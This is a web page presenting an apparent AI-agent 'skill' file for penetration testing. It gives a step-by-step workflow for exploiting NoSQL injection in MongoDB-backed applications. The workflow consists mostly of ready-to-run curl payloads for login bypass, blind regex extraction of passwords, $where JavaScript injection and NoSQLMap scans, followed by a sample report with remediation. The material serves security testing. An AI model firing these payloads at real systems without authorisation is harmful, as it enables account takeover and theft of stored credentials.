exploiting-nosql-injection-vulnerabilities

$npx mdskill add mukul975/Anthropic-Cybersecurity-Skills/exploiting-nosql-injection-vulnerabilities

Exploit NoSQL injection to bypass auth and extract data.

  • Enables authentication bypass and unauthorized data extraction.
  • Integrates with Burp Suite and NoSQLMap for payload generation.
  • Analyzes JSON inputs and MongoDB operators for vulnerability patterns.
  • Reports successful exploits with proof-of-concept payloads.

SKILL.md

.github/skills/exploiting-nosql-injection-vulnerabilitiesView on GitHub ↗
---
name: exploiting-nosql-injection-vulnerabilities
description: Detect and exploit NoSQL injection vulnerabilities in MongoDB, CouchDB, and other NoSQL databases to demonstrate authentication bypass, data extraction, and unauthorized access risks.
domain: cybersecurity
subdomain: web-application-security
tags: [nosql-injection, mongodb, authentication-bypass, injection-attack, web-security, database-security, api-testing]
version: "1.0"
author: mahipal
license: Apache-2.0
---

# Exploiting NoSQL Injection Vulnerabilities

## When to Use
- During web application penetration testing of applications using NoSQL databases
- When testing authentication mechanisms backed by MongoDB or similar databases
- When assessing APIs that accept JSON input for database queries
- During bug bounty hunting on applications with NoSQL backends
- When performing security code review of database query construction

## Prerequisites
- Burp Suite Professional or Community Edition with JSON support
- NoSQLMap tool installed (`pip install nosqlmap` or from GitHub)
- Understanding of MongoDB query operators ($ne, $gt, $regex, $where, $exists)
- Target application using a NoSQL database (MongoDB, CouchDB, Cassandra)
- Proxy configured for HTTP traffic interception
- Python 3.x for custom payload scripting

## Workflow

### Step 1 — Identify NoSQL Injection Points
```bash
# Look for JSON-based login forms or API endpoints
# Common indicators: application accepts JSON POST bodies, uses MongoDB
# Test with basic syntax-breaking characters
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin\"", "password": "test"}'

# Test for operator injection in query parameters
curl "http://target.com/api/users?username[$ne]=invalid"

# Check for error-based detection
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"query": {"$gt": ""}}'
```

### Step 2 — Perform Authentication Bypass
```bash
# Basic authentication bypass with $ne operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$ne": "invalid"}, "password": {"$ne": "invalid"}}'

# Bypass with $gt operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$gt": ""}, "password": {"$gt": ""}}'

# Target specific user with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": ".*"}}'

# Bypass using $exists operator
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$exists": true}, "password": {"$exists": true}}'
```

### Step 3 — Extract Data Using Boolean-Based Blind Injection
```bash
# Extract username character by character using $regex
# Test if first character of admin password is 'a'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^a"}}'

# Test if first two characters are 'ab'
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": "admin", "password": {"$regex": "^ab"}}'

# Enumerate usernames with regex
curl -X POST http://target.com/api/login \
  -H "Content-Type: application/json" \
  -d '{"username": {"$regex": "^adm"}, "password": {"$ne": "invalid"}}'
```

### Step 4 — Exploit JavaScript Injection via $where
```bash
# JavaScript injection through $where operator
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.username == \"admin\""}'

# Time-based detection with sleep
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "sleep(5000) || this.username == \"admin\""}'

# Data exfiltration via $where with string comparison
curl -X POST http://target.com/api/search \
  -H "Content-Type: application/json" \
  -d '{"$where": "this.password.match(/^a/) != null"}'
```

### Step 5 — Use NoSQLMap for Automated Testing
```bash
# Clone and setup NoSQLMap
git clone https://github.com/codingo/NoSQLMap.git
cd NoSQLMap
python setup.py install

# Run NoSQLMap against target
python nosqlmap.py -u http://target.com/api/login \
  --method POST \
  --data '{"username":"test","password":"test"}'

# Alternative: use nosqli scanner
pip install nosqli
nosqli scan -t http://target.com/api/login -d '{"username":"*","password":"*"}'
```

### Step 6 — Test URL Parameter Injection
```bash
# Parameter-based injection (GET requests)
curl "http://target.com/api/users?username[$ne]=&password[$ne]="
curl "http://target.com/api/users?username[$regex]=admin&password[$gt]="
curl "http://target.com/api/users?username[$exists]=true"

# Array injection via URL parameters
curl "http://target.com/api/users?username[$in][]=admin&username[$in][]=root"

# Inject via HTTP headers if processed by backend
curl http://target.com/api/profile \
  -H "X-User-Id: {'\$ne': null}"
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| Operator Injection | Injecting MongoDB operators ($ne, $gt, $regex) into query parameters |
| Authentication Bypass | Using operators to match any document and bypass login checks |
| Blind Extraction | Character-by-character data extraction using $regex boolean responses |
| $where Injection | Executing arbitrary JavaScript on the MongoDB server via $where operator |
| Type Juggling | Exploiting how NoSQL databases handle different input types (string vs object) |
| BSON Injection | Manipulating Binary JSON serialization in MongoDB wire protocol |
| Server-Side JS | JavaScript execution context available in MongoDB for query evaluation |

## Tools & Systems

| Tool | Purpose |
|------|---------|
| NoSQLMap | Automated NoSQL injection detection and exploitation framework |
| Burp Suite | HTTP proxy for intercepting and modifying JSON requests |
| MongoDB Shell | Direct database interaction for testing query behavior |
| nosqli | Dedicated NoSQL injection scanner and exploitation tool |
| PayloadsAllTheThings | Curated NoSQL injection payload repository |
| Nuclei | Template-based scanner with NoSQL injection detection templates |
| Postman | API testing platform for crafting NoSQL injection requests |

## Common Scenarios

1. **Login Bypass** — Bypass MongoDB-backed authentication using `{"$ne": ""}` operator injection in username and password fields
2. **Data Enumeration** — Extract database contents character by character using `$regex` blind injection when no direct output is visible
3. **Privilege Escalation** — Modify user role fields through NoSQL injection in profile update endpoints
4. **API Key Extraction** — Extract API keys or tokens stored in MongoDB collections through boolean-based blind techniques
5. **Account Takeover** — Enumerate valid usernames via regex injection then brute-force passwords through operator-based authentication bypass

## Output Format

```
## NoSQL Injection Assessment Report
- **Target**: http://target.com/api/login
- **Database**: MongoDB 6.0
- **Vulnerability Type**: Operator Injection (Authentication Bypass)
- **Severity**: Critical (CVSS 9.8)

### Vulnerable Parameters
| Endpoint | Parameter | Injection Type | Impact |
|----------|-----------|---------------|--------|
| POST /api/login | username | Operator ($ne) | Auth Bypass |
| POST /api/login | password | Regex ($regex) | Data Extraction |
| GET /api/users | id | $where JS Injection | RCE Potential |

### Proof of Concept
- Authentication bypass achieved with: {"username":{"$ne":""},"password":{"$ne":""}}
- Extracted 3 admin passwords via blind regex injection
- JavaScript execution confirmed via $where operator

### Remediation
- Use parameterized queries with MongoDB driver sanitization
- Implement input type validation (reject objects where strings expected)
- Disable server-side JavaScript execution ($where) in MongoDB config
- Apply least-privilege database access controls
```

More from mukul975/Anthropic-Cybersecurity-Skills

SkillDescription
acquiring-disk-image-with-dd-and-dcflddCreate forensically sound bit-for-bit disk images using dd and dcfldd while preserving evidence integrity through hash verification.
analyzing-active-directory-acl-abuseDetect dangerous ACL misconfigurations in Active Directory using ldap3 to identify GenericAll, WriteDACL, and WriteOwner abuse paths
analyzing-android-malware-with-apktoolPerform static analysis of Android APK malware samples using apktool for decompilation, jadx for Java source recovery, and androguard for permission analysis, manifest inspection, and suspicious API call detection.
analyzing-api-gateway-access-logs>
analyzing-apt-group-with-mitre-navigatorAnalyze advanced persistent threat (APT) group techniques using MITRE ATT&CK Navigator to create layered heatmaps of adversary TTPs for detection gap analysis and threat-informed defense.
analyzing-azure-activity-logs-for-threats>
analyzing-bootkit-and-rootkit-samples>
analyzing-browser-forensics-with-hindsightAnalyze Chromium-based browser artifacts using Hindsight to extract browsing history, downloads, cookies, cached content, autofill data, saved passwords, and browser extensions from Chrome, Edge, Brave, and Opera for forensic investigation.
analyzing-campaign-attribution-evidenceCampaign attribution analysis involves systematically evaluating evidence to determine which threat actor or group is responsible for a cyber operation. This skill covers collecting and weighting attr
analyzing-certificate-transparency-for-phishingMonitor Certificate Transparency logs using crt.sh and Certstream to detect phishing domains, lookalike certificates, and unauthorized certificate issuance targeting your organization.